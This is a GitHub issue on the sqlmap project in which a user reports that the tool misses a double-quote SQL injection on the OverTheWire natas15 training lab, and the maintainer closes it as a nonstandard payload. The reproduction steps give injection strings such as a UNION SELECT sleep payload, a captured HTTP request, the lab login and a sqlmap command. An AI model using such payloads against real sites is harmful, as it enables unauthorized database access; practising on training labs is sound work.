search

sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org
Other
31.89k stars 5.66k forks source link

Unable to detect SQLi when code uses double quotes #4397

Closed ghost closed 3 years ago

ghost commented 3 years ago

Describe the bug Does sqlmap have the ability to exploit sqli vulnerabilities using " instead of '?

For example, I know there is a mysql sqli vulnerability at http://natas15.natas.labs.overthewire.org/index.php (this is a pen testing lab/training site specifically for trying to find and exploit vulnerabilities) using:

" union SELECT sleep(1000000), "a

but when I try to use sqlmap to speed up exploitation/exfiltration, sqlmap doesn't see the sqli vuln.

If sqlmap already does this, then any idea why the tool doesn't spot the sqli at that location when I know it's there. Anyway, if sqlmap isn't trying " in it's injection attempts, possibly make that an option? like --quote-type where default is '

To Reproduce

  1. Browse to ttp://natas15.natas.labs.overthewire.org/index.php
  2. Username is natas15, Password is AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J
  3. For username here, enter: " or "a" = "a
  4. Click "check existence" button
  5. Go back
  6. For username, now enter: " union SELECT sleep(1000000), "a
  7. Clearly exploitable
  8. Either put the below into request.txt or, using Burp or some other tool, grab the request and create a request.txt file 
    
POST /index.php HTTP/1.1
Host: natas15.natas.labs.overthewire.org
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: http://natas15.natas.labs.overthewire.org
DNT: 1
Authorization: Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==
Connection: close
Referer: http://natas15.natas.labs.overthewire.org/index.php
Upgrade-Insecure-Requests: 1

username=put+sqli+here


9. Run sqlmap -r request.txt -p username 

**Expected behavior**
I expect sqlmap to identify this sqli

**Running environment:**
* Installation method 
git clone
* Client OS 
fedora 31
* Program version 
sqlmap --version
1.4.7.12#dev

* Target DBMS
mysql

* Detected WAF/IDS/IPS protection 
unknown - but i was able to execute timebased sqli scripted to get what i needed, so i don't think there's a waf blocking

* SQLi techniques found by sqlmap 
none - sqlmap did not identify any sqli vulns
stamparm commented 3 years ago

Clearly exploitable <- give me a break. This issue does not have anything to do with "Unable to detect SQLi when code uses double quotes". Your payload is "clearly" not standard/common " union SELECT sleep(1000000), "a

stamparm commented 3 years ago

Closed this down because clearly there is no issue with the sqlmap here